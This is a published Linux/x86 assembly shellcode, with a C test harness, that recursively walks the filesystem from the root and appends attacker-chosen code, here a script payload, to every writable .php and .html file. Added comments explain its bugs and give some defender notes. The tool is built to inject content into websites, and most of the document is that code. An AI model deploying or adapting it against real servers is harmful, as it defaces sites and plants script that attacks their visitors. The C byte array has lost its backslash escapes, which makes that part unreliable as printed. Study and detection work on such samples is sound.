# Title : Linux/x86 Search For php,html Writable Files and Add Your Code
# Published : 2012-01-17
# Author :
; Title : Linux/x86 Search php,html writable files and add your code.
; Date : 2011-10-24
; Author: rigan - imrigan [sobachka ] gmail.com
; Size : 380 bytes + your code.
;
; Note : This shellcode appends your code to the end of each
; file it finds. Your code will be added only to .html and .php
; files. The search for files is carried out recursively.
; NASM syntax, 32-bit Linux (i386), raw int 0x80 syscalls, no libc.
BITS 32
section .text
global _start
_start:
;======================================================================;
; main ;
;======================================================================;
;-----------------------------------------------------------------------
; _start: entry point. chdir("/"), walk the whole tree via search
; (appending the payload to writable files whose name contains ".html"
; or ".php"), then exit(0).
; Syscall numbers are loaded with xor eax / mov al, presumably to keep
; the encoded bytes zero-free (the hex listing at the end of the page
; appears to contain no 0x00 byte).
; Defender notes: the observable behaviour is chdir("/"), a recursive
; readdir(89)/lstat64(196)/chdir walk of the filesystem that skips
; "proc*" and dot-entries and never follows symlinks, then
; open(O_WRONLY) + lseek(SEEK_END) + write on each writable match.
; A document root that is not writable by the compromised uid, and
; file-integrity monitoring on web content, both defeat the inject step.
;-----------------------------------------------------------------------
; chdir("/")
xor eax, eax
push eax                        ; NUL terminator
sub esp, BYTE 0x1
mov BYTE [esp], 0x2f            ; "/"
mov ebx, esp                    ; ebx = "/"
mov al, 12                      ; SYS_chdir
int 0x80
; Build ".\0" on the stack: search reads it at [ebp+8] as the name of
; the directory to open (the call below pushes the return address
; directly above it).
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2e            ; "."
; jmp / call / jmp trampoline: the call goes backwards (negative rel32,
; no zero bytes) and the short jmp reaches search.
jmp SHORT .exit
.jmp_search:
jmp SHORT search
.exit:
call .jmp_search                ; search(); returns here when the walk is done
; exit(0)
xor eax, eax
xor ebx, ebx
mov al, 1                       ; SYS_exit
int 0x80
;======================================================================;
; inject ;
;======================================================================;
inject:
;-----------------------------------------------------------------------
; inject: append the payload to one file.
; In:    edi = NUL-terminated file name (relative to the current dir)
;        esi = payload address (pushed by the call in .your_code)
; Out:   eax = result of the final close(); the results of open, lseek
;        and write are not checked, so an open failure is silently ignored
; Clobb: ebx, ecx, edx, flags
;-----------------------------------------------------------------------
; open("file", O_WRONLY)
xor eax, eax
mov ebx, edi                    ; ebx = file name
xor ecx, ecx
mov cl, 2                       ; O_WRONLY
mov al, 5                       ; SYS_open
int 0x80                        ; eax = fd (or -errno, not checked)
; lseek(fd, 0, SEEK_END)
xor ebx, ebx                    ; redundant: overwritten on the next line
mov ebx, eax                    ; ebx = fd, kept for lseek and write
xor ecx, ecx                    ; offset 0
xor eax, eax
cdq                             ; edx = 0 (eax is 0)
mov dl, 2                       ; SEEK_END
mov al, 19                      ; SYS_lseek
int 0x80
; write(fd, your_code, sizeof(your_code))
xor eax, eax
mov ecx, esi                    ; ecx = payload
mov dl, 43 ; <- TO CHANGE THE SIZE HERE. (upper bytes of edx are still 0 from cdq; 43 = length of the db in .your_code)
mov al, 4                       ; SYS_write
int 0x80
; close(fd)
xor eax, eax
xor ebx, ebx                    ; ebx = 0: this is close(0) (stdin), not the fd from open above
mov al, 6                       ; SYS_close -- the descriptor opened above is never closed here
int 0x80
ret
;======================================================================;
; substr ;
;======================================================================;
substr:
;-----------------------------------------------------------------------
; substr: look for the string at esi inside the string at edi.
; In:    edi = NUL-terminated haystack (directory entry name)
;        esi = NUL-terminated needle (".html" or ".php")
; Out:   al = 2 if found. Otherwise al is 0 when the haystack was
;        exhausted in loop_1, or the last needle byte compared when the
;        mismatch happened in loop_2; callers only test al == 2.
; Clobb: ebx, ecx, edx, flags; edi and esi are preserved
; Notes: scanning starts at offset 1 of the haystack, so a needle at
; offset 0 is never seen; the needle may match anywhere, not only as a
; suffix; and once a first needle byte matches, a later mismatch returns
; not-found immediately instead of resuming the scan further along
; (see the jmp after loop_2).
;-----------------------------------------------------------------------
xor eax, eax                    ; result / current needle byte
xor ebx, ebx                    ; current haystack byte
xor ecx, ecx                    ; needle index
cdq                             ; edx = 0 (haystack index)
loop_1:
inc edx                         ; advance haystack; first pass starts at offset 1
; edi contains the filename address
; esi contains the substring address
mov BYTE bl, [edi + edx]
test bl, bl
jz not_found                    ; end of haystack, eax is still 0
cmp BYTE bl, [esi]              ; does this byte match the first needle byte?
jne loop_1
loop_2:
mov BYTE al, [esi + ecx]
mov BYTE bl, [edi + edx]
test al, al
jz found                        ; whole needle consumed
inc ecx
inc edx
cmp bl, al
je loop_2
jmp short not_found             ; mismatch: no backtracking to the next offset
found:
xor eax, eax
mov al, 2
not_found:
ret
;======================================================================;
; search ;
;======================================================================;
;This function recursively find all writable files. [php, html]
search:
;-----------------------------------------------------------------------
; search: recursive walk of the current directory.
; Entry:  eax must be 0 (the frame size is loaded with mov al); both
;         call sites satisfy this (_start after xor eax, .l3 after chdir
;         returned 0). The caller has placed ".\0" on the stack directly
;         under the return address; it is read here as [ebp+8].
; Frame:  [ebp+8]   = "." (directory to open)
;         [ebp+12]  = fd of that directory
;         [esp+0]   = lstat64 buffer; only st_mode at +16 is read
;         [esp+100] = old_linux_dirent buffer; d_name at +110
;         Offsets are taken from the live esp, which moves down because
;         the pushes below are never popped; leave reclaims them.
; Exit:   every return path does chdir("..") first, so the caller's
;         working directory is restored.
; Clobb:  eax, ebx, ecx, edx, esi, edi, flags
;-----------------------------------------------------------------------
push ebp
mov ebp, esp
mov al, 250                     ; frame size; assumes eax == 0 on entry
sub esp, eax
; open(".", O_RDONLY)  -- ecx = 0; the original comment said O_WRONLY
xor eax, eax
xor ecx, ecx
lea ebx, [ebp + 8]              ; "." left on the stack by the caller
mov al, 5                       ; SYS_open
int 0x80
test eax, eax
js .old_dirent                  ; open failed: chdir("..") and return
mov [ebp + 12], eax             ; save the directory fd
.while:
; readdir(fd, struct old_linux_dirent *dirp, count)
; Legacy syscall 89: one entry per call, returns 1 on success, 0 at end.
; edx (count) is not set here; a negative (error) return also takes the
; jnz below and is handled like an entry.
mov esi, [ebp + 12]
mov ebx, esi
xor eax, eax
xor ecx, ecx
lea ecx, [esp + 100]            ; dirent buffer
mov al, 89                      ; SYS_readdir
int 0x80
test eax, eax
jnz .l1
; closedir(fd)
xor eax, eax
xor ebx, ebx
mov ebx, esi
mov al, 6                       ; SYS_close
int 0x80
.old_dirent:
; chdir("..")
xor eax, eax
push eax
push WORD 0x2e2e                ; ".."
mov ebx, esp
mov al, 12                      ; SYS_chdir
int 0x80
leave                           ; drops the frame and every unpopped temporary
ret
.l1:
lea edx, [esp + 110]            ; edx = d_name
cmp DWORD [edx], 0x636f7270 ; If the /proc filesystem detected... (first four bytes == "proc")
je .while ; ...next dir
cmp BYTE [edx], 0x2e            ; names starting with '.' (".", "..", dotfiles) are skipped
jne .l2
jmp .while
.l2:
; lstat(const char *file, struct stat *buf)  -- syscall 196 is lstat64 on i386
mov ebx, edx
mov ecx, esp
xor eax, eax
mov al, 196                     ; SYS_lstat64
int 0x80
; S_IFMT (0xF000) and S_IFLNK (0xA000) are built as 0xEFFF+1 / 0x9FFF+1,
; which keeps the immediates free of zero bytes.
mov cx, 61439
mov bx, 40959
inc ecx
inc ebx
mov eax, [esp + 16]             ; st_mode
and ax, cx
cmp ax, bx
jne .l3
jmp .while                      ; symlink: skipped, never followed
.l3:
; Build ".\0" for the recursive call's open("."), read there as [ebp+8].
xor eax, eax
push eax
sub esp, BYTE 0x1
mov BYTE [esp], 0x2e
; chdir("file")
mov ebx, edx
mov al, 12                      ; SYS_chdir (eax was zeroed above)
int 0x80
test eax, eax
jne .l4                         ; not a directory (or not enterable): treat as a file
call search                     ; recurse; it chdir("..")s back before returning
jmp .while
.l4:
; access("file", W_OK)
xor eax, eax
mov ebx, edx
xor ecx, ecx
mov cl, 2                       ; W_OK
mov al, 33                      ; SYS_access
int 0x80
test eax, eax
jz .check_html                  ; writable: now check the name
jmp .while
;======================================================================;
; check_html ;
;======================================================================;
.check_html:
; ".html\0" on the stack (never popped).
xor eax, eax
push eax
push DWORD 0x6c6d7468 ; "html"
sub esp, BYTE 0x1 ; .html
mov BYTE [esp], 0x2e ;
mov esi, esp                    ; needle
mov edi, edx                    ; haystack = d_name (also inject's file name)
call substr
cmp BYTE al, 2
je .do_inject
;======================================================================;
; check_php ;
;======================================================================;
.check_php:
; ".php\0" on the stack (never popped); edi still holds d_name.
xor eax, eax
push eax
push DWORD 0x7068702e ; .php
mov esi, esp
call substr
cmp BYTE al, 2
je .do_inject
jmp .while
;======================================================================;
; do_inject ;
;======================================================================;
.do_inject:
; jmp / call / pop: the call in .your_code pushes the address of the db
; bytes that follow it, which .write pops into esi.
jmp SHORT .your_code
.write:
pop esi ; Get the address of your code into esi
call inject                     ; inject(edi = file name, esi = payload)
jmp .while
;======================================================================;
; your_code ;
;======================================================================;
.your_code:
call .write
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it. (43 bytes, matching "mov dl, 43" in inject)
; Don't forget to change the size of your code!
------------------------------------------------------------------------
The equivalent shellcode (assembled bytes) is presented below.
#include <stdio.h>
/* Assembled bytes of the listing above (the header states 380 bytes of
 * code plus the 43-byte payload). As printed on this page the hex
 * escapes have lost their backslashes ("x31xc0..." where "\x31\xc0..."
 * would be expected), so this literal is not byte-equivalent to the
 * assembly; use the hex pairs, not the literal, as the reference when
 * writing detection signatures. */
char shellcode[] =
"x31xc0x50x83xecx01xc6x04x24x2fx89xe3xb0x0cxcdx80"
"x31xc0x50x83xecx01xc6x04x24x2exebx02xebx63xe8xf9"
"xffxffxffx31xc0x31xdbxb0x01xcdx80x31xc0x89xfbx31"
"xc9xb1x02xb0x05xcdx80x31xdbx89xc3x31xc9x31xc0x99"
"xb2x02xb0x13xcdx80x31xc0x89xf1xb2x2bxb0x04xcdx80"
"x31xc0xb0x06xcdx80xc3x31xc0x31xdbx31xc9x99x42x8a"
"x1cx17x84xdbx74x1ax3ax1ex75xf4x8ax04x0ex8ax1cx17"
"x84xc0x74x08x41x42x38xc3x74xf0xebx04x31xc0xb0x02"
"xc3x55x89xe5xb0xfax29xc4x31xc0x31xc9x8dx5dx08xb0"
"x05xcdx80x85xc0x78x22x89x45x0cx8bx75x0cx89xf3x31"
"xc0x31xc9x8dx4cx24x64xb0x59xcdx80x85xc0x75x19x31"
"xc0x31xdbx89xf3xb0x06xcdx80x31xc0x50x66x68x2ex2e"
"x89xe3xb0x0cxcdx80xc9xc3x8dx54x24x6ex81x3ax70x72"
"x6fx63x74xc6x80x3ax2ex75x05xe9xbcxffxffxffx89xd3"
"x89xe1x31xc0xb0xc4xcdx80x66xb9xffxefx66xbbxffx9f"
"x41x43x8bx44x24x10x66x21xc8x66x39xd8x75x05xe9x97"
"xffxffxffx31xc0x50x83xecx01xc6x04x24x2ex89xd3xb0"
"x0cxcdx80x85xc0x75x0axe8x65xffxffxffxe9x79xffxff"
"xffx31xc0x89xd3x31xc9xb1x02xb0x21xcdx80x85xc0x74"
"x05xe9x64xffxffxffx31xc0x50x68x68x74x6dx6cx83xec"
"x01xc6x04x24x2ex89xe6x89xd7xe8x09xffxffxffx3cx02"
"x74x18x31xc0x50x68x2ex70x68x70x89xe6xe8xf6xfexff"
"xffx3cx02x74x05xe9x30xffxffxffxebx0bx5exe8xb9xfe"
"xffxffxe9x23xffxffxffxe8xf0xffxffxff"
// <html><script>alert("pwn3d")<script></html>   -- the 43-byte payload appended to each file
"x3cx68x74x6dx6cx3ex3cx73x63x72x69x70x74x3ex61x6c"
"x65x72x74x28x22x70x77x6ex33x64x22x29x3cx73x63x72"
"x69x70x74x3ex3cx2fx68x74x6dx6cx3e";
/* Test harness: prints the payload length and jumps into the byte array.
 * strlen is used without <string.h> (only <stdio.h> is included above),
 * and "%dn" presumably read "%d\n" before the backslash was lost in this
 * listing. Calling into a char[] in writable data needs an executable
 * data segment; on a host enforcing NX / W^X this call faults, which is
 * the expected outcome on hardened systems. */
int main()
{
printf("%dn", strlen(shellcode)); /* strlen stops at the first 0x00, so the count is only meaningful while the bytes stay zero-free */
(*(void (*)()) shellcode)(); /* executes the shellcode in this process */
return 0;
}